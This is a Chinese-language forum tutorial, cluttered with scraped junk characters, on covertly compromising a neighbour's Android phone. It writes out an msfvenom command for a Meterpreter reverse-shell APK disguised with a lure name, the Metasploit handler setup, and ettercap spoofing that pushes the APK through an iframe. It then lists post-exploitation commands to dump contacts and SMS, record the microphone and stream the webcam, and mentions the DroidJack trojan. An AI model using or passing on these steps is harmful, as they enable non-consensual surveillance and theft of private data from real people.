1 H) Y8 y. @1 g6 |5 F
五、msf+ettercap入侵邻居安卓手机
: n8 j- d% M2 e/ Q
9 Y6 Q' R# C( N
/ X& o4 p& w$ b/ a' w4 s& X$ j 首先启动msf 7 z. k4 `: R. y! u0 J0 t: V
/ g! r" h0 H* E- c
! B. R& m2 P2 z5 H) N 先用kali生成一个安卓木马,如下命令:
/ L. Y. y/ e! g" |6 q) q ' a$ G/ \0 b: q* l, @$ V
, H/ x0 s* i! K( P7 ~' I# e
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
+ o" Y# ~% ]6 _" T8 j" T& }* Y . k6 d( R s, ?" s# j# Q
# S+ [$ o4 t! G0 z. d; c7 e
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
9 S6 Q/ b9 O: b2 Q8 }
! D( J, \' J6 P1 ?% F( [
+ m. w( [# G6 w L 然后进入msf
9 ?9 N- x( ~7 w; Z8 X % H. K: C: Q0 _0 H0 B
0 V; e! F3 d) ], _- ]0 e
use exploit/multi/handler 0 t* o! c5 G: k' m3 ?* a& F/ m9 s
- X/ U# c+ { \2 g+ U$ x; h" I, E4 Z t2 Y3 J" {0 e
set payload android/meterpreter/reverse_tcp - P# Y+ O/ \( ]6 T& X) t7 p
+ B8 ]5 T. n, j$ A# Z8 N2 `1 H8 g7 x; K; h. K. v$ ]
set LHOST 192.168.0.109 //ip为kaili的ip
# K4 T& R* c5 ?, _/ F9 x ' y6 {) Y1 N( s: w
$ M4 A8 \8 c: U1 s) r) C set LPORT 44444 //端口一定要与前面生成的木马的端口一致
5 X/ B- ?6 A8 H7 R; Z- [1 | 9 y6 K" u+ x, w
9 U0 l y3 x/ w" l$ m6 X0 K. Q Exploit
% j1 H% X! ?7 C; J5 t5 H% M( P4 P+ \7 j. z% [ $ z8 c, t; B2 |3 X3 a
3 p: i% Z/ A4 _5 e( g# F# w
/ m; }8 }5 E) M + H' ^3 q- z* g* H
8 o5 J! u4 V7 o 下面我们开启ettercap -G
! j) |6 ^! v+ H! b/ `2 N+ E
9 \5 q% x- X: d+ \
5 |& k6 B8 t1 Y* e" H9 a 我物理IP为
: s% h; `' X, J& J: |
" m4 m- \/ J3 y1 a* D
4 N$ ?' Y$ o; Z2 Y
- x" t. h1 ^% Z; _ G1 |
2 f A. \ ~5 E. S, H& h: x$ B% O& w2 [ q' x- y- d0 P
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
% m! F1 _9 E/ _" q( D9 b4 b# L
' \. U3 G; w& E V# H, T `2 W5 M: K% U6 O' B/ z6 \
下面我们来设置一下
* W5 J4 X2 {4 a& ] $ I+ D7 h) L& X
' G- s9 T3 J& p% P8 s9 q1 m* H% w# T
& Y" `5 O" C$ @$ Z0 W - p9 j0 f1 g' R( Z
9 P, E" V/ [$ s/ _ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
. ?, R+ @; `. M, c6 m ( T0 l! w+ \5 `1 c% u" L8 F8 G
" }2 ~: J7 O" ]% J; p
5 o; h' P; m6 K& J' s/ { " t7 i. x3 P! z/ p
2 b& p, N- f2 c7 T9 i' R
0 A$ ?) ~, q. t5 \ # w9 ]# j' J: @4 ^, @4 P7 ^
! O2 O T! [; `; j
8 P4 @' j" c5 P: ^6 @1 N) `
$ G: Y( }/ y3 @# ~
( }7 P q5 z9 l- q: a, u' b ; Z( N3 p: Z- _, V% _: a! Z! N
; c# G1 |" G/ Z
, b6 V0 B+ a7 V- a7 ^
! ?# z! F6 n0 C! G$ t 5 D0 f4 {3 K4 z) T3 P
2 Z: Q& s& H; g, l7 x/ w ' ?" y V2 x) Y* t- ~' E
; ?0 O5 P* G; w. R2 x$ l
5 O, ?5 X& `( i2 ]9 j0 s) X) X5 e* P8 x
) K1 o& O. u+ q$ t! g 6 B: `1 H5 k2 Q& [7 H
+ J6 y! ], |! M; C
' x4 C' v' P. C- }6 Z
% T* ^+ q5 r/ g
/ P% k4 M/ x3 U5 [8 I1 A 0 l# H5 j+ M, Y: L9 h0 ^% @, S
0 n4 O. m& O+ U2 \6 o% @8 R% y1 s! _3 R5 i) x4 a- j; `& ^
( `- Q$ M) m5 V+ \; L - C# L d0 U1 ^
) O8 i. Z! d3 u; A9 K/ M
: k6 Q& \3 Y1 M( X# r4 G
$ U7 k& L7 g- G
7 ?( B# l& V, G5 t) i . o2 X, ?* k$ g' h) c% K' |
( e' G& Z2 h7 L" |
+ K7 K1 z- ]+ _
4 V/ X. G- h, |" }
% o+ W6 O7 r6 Q% d
2 w/ w4 E8 s8 |
下面我们开始攻击 & n! {3 B# T. j. P
- t, v4 C" ~3 x
9 C+ f: f$ X$ e8 ^4 `& R( G
0 U ]+ t) n* }" j! t( R7 O
4 o$ H$ H( O- V7 e5 y8 O0 _
) i& n7 t f+ O
! C+ i3 H$ B8 I, ]& `# k O, { 5 u9 a8 h5 w+ k/ C
- L5 P& o* L8 Q* {/ K2 H( u
5 Z3 \% ]3 _1 T
. L; a0 a0 r: \2 a1 a. F* H
# J0 V7 x: b6 L2 t' m! W) Q) L" W
( C: V5 X m! u0 |9 i0 n3 q* } 6 R/ ^7 S. Y: [
; b1 V. t+ l8 B) @; K
0 J$ a4 b* F' J% ^- P 5 v" x& y2 W1 F3 @; S* T' F
2 T1 R0 L F1 a/ p% v, V
大概过了5分钟多,发现反弹成功了 5 G; `6 p1 t0 F7 I( u+ A5 z0 u
: C2 @7 D; @2 ^ [; D9 Z# ? M* H0 ^6 D( V
: r# J5 V! Q' ]2 {/ k # ^6 r/ H: B! w, R+ h: j1 {. s
( |6 I. f4 J/ e" R; V; z. ?
; F, P3 Q5 {+ j# _# v. E, I* h( p
; f/ L2 n3 x: m1 e& G. M7 N0 M* Z
4 O7 r0 x. t& u% ]
* [9 k4 p& ^0 i7 A: x2 n. \2 b z' i1 U. c
, p. z9 A& N, R3 v* @* e; ]7 g$ D$ i
" f" C: }8 E" A# E# T* ^# A! S, Y. n0 o2 E. t, }3 N' X4 m
- J7 u' D9 n4 l+ G& {" ] . d; u- p6 z/ w$ L" ~
/ j9 ]5 V* q6 @: ^# b - ~, W+ W9 |" j3 @
* h9 M/ u" x0 \2 q0 t/ G5 V8 ^
2 |' R' Z* `1 y/ O: Z' L8 H, O
& [, t: Z* }6 e+ d; L6 ~, ]) m5 E
9 M/ W I6 r: d& C% j
0 o6 C) l& P2 A d 执行命令 " K$ X6 n1 ?" T
* \% u4 |! \; \/ x/ j: i
& t# A; W% Y9 \9 Z2 _, \ 2 A/ Z6 ~' q! w/ X# y
4 j8 s. U, G3 c$ d" V! q* h. ~
8 H. l1 |8 O& S3 j dump_contacts --》这个是导出电话
6 p7 j; M" b H* \ ' Q( l7 v0 S( j. N* y; \6 v- B7 z# F
$ I' b# H% P1 X r1 |+ u dump_sms --》这个是导出信息 3 }' g8 W6 n6 y& M# h
1 s9 l- k! d/ y% l
6 A5 J$ ~3 X7 g( G& b3 Q: K7 H record_mic Record audio from the default microphone for X seconds
" q1 J k: k' g* }2 x3 n
4 t( {3 v, }# U1 x- X% @ v, z( Q1 o
webcam_chat Start a video chat
& _/ f) m3 N. v, o% N" |/ Z
) u$ J0 R5 e0 ^4 S9 R i" @4 p+ l4 F
webcam_list List webcams 8 x2 C" u7 V' c
$ J- [# f% E A1 L8 `
; o% O% ?( e/ u8 W# { webcam_snap Take a snapshot from the specified webcam
9 z7 C" n8 m. Q" A, P8 ^
- O0 r' n, o1 ~7 V( e- Q# ~5 W- A3 y2 b0 [4 O! p a* j6 L( g
webcam_stream   lay a video stream from the specified webcam ) r! n" {4 e6 v/ [: Y# J
1 J p* i( ~: o7 V
6 x2 B- ?: r* N 5 Q& B2 y% u! ?6 @5 L; |* g8 w
$ f; E& k9 H1 n! b8 ?
( V2 X/ R, U) D! \. \0 m, N- N/ B
$ K; h( r# N8 h6 J 0 E7 s- D: ?0 w( A, g# }2 E9 m
0 q& `) ?9 a4 }# W* y
我们打开看一下电话薄,
4 ^9 }5 s: U& C0 [
" Q: V7 n/ J, k& R( T' J% C6 k' N8 W+ ~6 I$ i+ Q- ]# h3 C
6 y3 c! v( q7 S
- ~7 \! X% a5 q2 ]: M+ {
3 O1 E& O/ X) ?, ~8 c0 E' X* q4 @
' O3 b* `$ N- ~! `* l8 m( T+ ?$ Q' O+ H
# j- T$ p# o9 |2 i9 [3 i& m5 `
% m+ T- ]/ U3 {2 ~! O
) p7 R6 r/ s; b* J/ M
+ P# O6 a' z4 Z; r+ k- F) b& M0 f! R, t1 w" Q# f
$ b N" W( p/ R* N/ p) \# V/ t. ~
4 X5 H) H" \. U8 Z% H* i" K3 |6 }! @! B5 L: b2 b
7 r. h( D$ V8 @ `6 J
* x1 w( C$ c8 ~% l$ |
- R( r a6 i ^4 T \ c; _% M
3 X) b% F9 a3 r. H3 t
+ G q+ I1 c% D. g0 I4 ^% x* v, @
) N5 O) a4 y0 ]- ~ 我们同时欺骗成DroidJack木马,使用方法如图:
: S" r( H9 ~) T6 q0 ^5 R / B4 J$ f9 `+ `. A6 {4 W
+ _4 Z) \2 U2 N( z1 z- s+ }
, P: X; m, J+ x* k: d
* L6 A& A# ?* {# d: F/ B
2 d6 |) P2 }: X- I5 h+ M
: i0 {+ N9 {) _' s8 l$ h% f% x
; V/ n, m, k! t2 p: r& x" Z4 l# u# \: K) \" j0 h
+ R! W4 C2 N# K, p
& U M" |. \3 d6 ^0 y9 { D8 y; W$ c* h! u S$ m2 U
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
! ] y0 P( s. Q
0 a& |: s/ _5 P1 I
" d6 I% c( }( I2 y
1 l2 {- n5 B3 }4 F: B; [9 V4 _* [ O/ H0 B6 G/ G! u5 t
y6 h2 \/ [) ?' i 3 C" h- C# I1 d2 A: X
( j. L5 E" B3 R9 d; X1 k* v2 M2 s" U+ o2 f# N& R
1 D3 D/ u7 q8 K# y' d* c) I
- x- a4 c6 f2 ?- r$ R
2 k) b4 B. u4 B( H* `
 6 J2 Q) z1 ~ [# b9 A2 V0 [2 Z
, Z( g: ~ O- c1 H# c
: D8 \7 u8 H+ T( \6 ?
: I V) e7 c7 h1 a# Z. ? L7 f8 z |